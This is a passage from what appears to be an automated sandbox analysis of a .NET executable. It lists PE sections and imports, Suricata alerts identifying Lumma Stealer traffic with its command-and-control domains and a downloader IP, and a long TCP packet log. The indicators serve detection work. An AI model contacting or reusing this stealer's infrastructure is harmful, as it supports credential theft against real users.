                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc39c0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x818.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xc3800x1c.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xa3f40xa400c5c3ca1a60a255d8b96c06b1c3f3a5feFalse0.24280678353658536data3.937270708731149IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xe0000x8180xa0044dacd5706e6e7d74f88714de6c5c429False0.301953125data3.4692694053567505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x100000xc0x2003c8ea00c4589b32634d06ca88f94e2b8False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0xe0900x588data0.3255649717514124
                                      RT_MANIFEST0xe6280x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-12T21:32:05.359783+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549704147.45.44.13180TCP
                                      2024-12-12T21:32:05.574589+01002800029ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass1147.45.44.13180192.168.2.549704TCP
                                      2024-12-12T21:32:06.957951+01002057949ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)1192.168.2.5568591.1.1.153UDP
                                      2024-12-12T21:32:06.957951+01002057981ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)1192.168.2.5568591.1.1.153UDP
                                      2024-12-12T21:32:07.176360+01002057945ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)1192.168.2.5599781.1.1.153UDP
                                      2024-12-12T21:32:07.176360+01002057983ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)1192.168.2.5599781.1.1.153UDP
                                      2024-12-12T21:32:07.412962+01002057929ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)1192.168.2.5590921.1.1.153UDP
                                      2024-12-12T21:32:07.412962+01002057979ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)1192.168.2.5590921.1.1.153UDP
                                      2024-12-12T21:32:07.639261+01002057931ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)1192.168.2.5534061.1.1.153UDP
                                      2024-12-12T21:32:07.639261+01002057977ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)1192.168.2.5534061.1.1.153UDP
                                      2024-12-12T21:32:07.871319+01002057925ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)1192.168.2.5591221.1.1.153UDP
                                      2024-12-12T21:32:07.871319+01002057973ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)1192.168.2.5591221.1.1.153UDP
                                      2024-12-12T21:32:09.569495+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.549705172.67.206.64443TCP
                                      2024-12-12T21:32:09.569495+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.549705172.67.206.64443TCP
                                      2024-12-12T21:32:09.569495+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.206.64443TCP
                                      2024-12-12T21:32:10.590925+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705172.67.206.64443TCP
                                      2024-12-12T21:32:10.590925+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.206.64443TCP
                                      2024-12-12T21:32:10.939727+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.549706172.67.206.64443TCP
                                      2024-12-12T21:32:10.939727+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.549706172.67.206.64443TCP
                                      2024-12-12T21:32:10.939727+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.206.64443TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 12, 2024 21:32:03.973370075 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:04.093158007 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:04.093251944 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:04.093641043 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:04.216094971 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.359586954 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.359735012 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.359747887 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.359782934 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.360157967 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.360208988 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.360388994 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.360409021 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.360455990 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.360460997 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.360467911 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.360512018 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.361282110 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.361294031 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.361413956 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.479578972 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.479691029 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.480835915 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.551692963 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.551733971 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.551866055 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.555852890 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.557606936 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.557684898 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.557697058 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.565943956 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.566025019 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.566041946 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.574491978 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.574568987 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.574589014 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.583064079 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.583137035 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.583168983 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.591504097 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.591567039 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.591583967 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.600019932 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.600101948 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.600116968 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.608514071 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.608593941 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.608624935 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.616997004 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.617122889 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.617125034 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.625452042 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.625557899 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.625585079 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.634002924 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.634095907 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.671679020 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.671710968 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.671821117 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.743730068 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.743938923 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.744242907 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.746479034 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.746576071 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.746620893 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.751902103 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.753699064 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.753796101 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.753817081 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.759272099 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.759438992 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.759527922 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.764195919 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.764307976 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.764352083 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.769289017 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.769360065 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.769504070 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.774276018 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.774322033 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.774353027 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.779128075 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.779201031 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.779223919 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.784019947 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.784094095 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.784136057 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.789093018 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.789165020 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.790045977 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.793987989 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.794111967 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.794154882 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.798954964 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.798978090 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.799014091 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.803713083 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.803849936 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.803878069 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.807867050 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.807883978 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.808038950 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.811326027 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.811398029 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.811429977 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.815143108 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.815213919 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.815243959 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.819736004 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.819884062 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.819911003 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.824094057 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.824244022 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.824273109 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.827797890 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.827950001 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.828108072 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.830713987 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.830781937 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.830892086 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.834651947 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.834737062 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.938309908 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.938482046 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.938559055 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.939806938 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.940018892 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.940074921 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.942253113 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.942468882 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.942608118 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.945373058 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.945688009 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.945795059 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.948846102 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.949023008 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.949084997 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.952142954 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.952342033 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.952503920 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.955262899 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.955620050 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.955755949 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.958868980 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.959239960 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.959335089 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.961821079 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.962016106 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.962222099 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.964579105 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.964787006 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.964858055 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.967196941 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.967387915 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.967503071 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.969955921 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.969991922 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.970122099 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.972387075 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.972582102 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.972691059 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.975153923 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.975191116 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.975280046 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.978142023 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.978319883 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.978462934 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.980789900 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.980804920 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.980890036 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.983381033 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.983393908 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.983457088 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.985842943 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.985853910 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.985949993 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.988466978 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.988641024 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.988785028 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.991087914 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.991271019 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.991341114 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.993588924 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.993602991 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.993675947 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.996134043 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.996313095 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.996373892 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:05.997864008 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.998950958 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:05.999166965 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.001720905 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.001928091 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.001982927 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.004287958 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.004323959 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.004391909 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.006969929 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.007154942 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.007209063 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.009622097 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.009809017 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.009859085 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.011785030 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.011821032 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.011871099 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.013191938 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.013417006 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.013495922 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.015131950 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.015358925 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.015480042 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.017860889 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.017961025 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.018045902 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.020590067 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.020745039 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.020804882 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.023452044 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.023582935 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.023641109 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.026038885 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.026272058 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.026432037 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.028764009 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.028877020 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.028978109 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.031409979 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.080101967 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.128485918 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.128515005 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.128851891 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.129296064 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.129489899 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.129560947 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.131537914 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.131648064 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.131830931 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.133904934 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.133979082 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.134181023 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.136919022 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.137043953 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.137110949 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.142333031 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.142697096 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.142709017 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.142719984 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.142788887 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.142858982 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.143285036 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.143297911 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.143348932 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.145445108 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.145586967 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.145647049 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.147013903 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.147186995 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.147245884 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.149085999 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.149230003 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.149482965 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.151197910 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.151384115 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.152564049 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.153083086 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.153232098 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.153461933 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.155133009 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.155210972 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.155349016 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.156915903 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.157058001 CET8049704147.45.44.131192.168.2.5
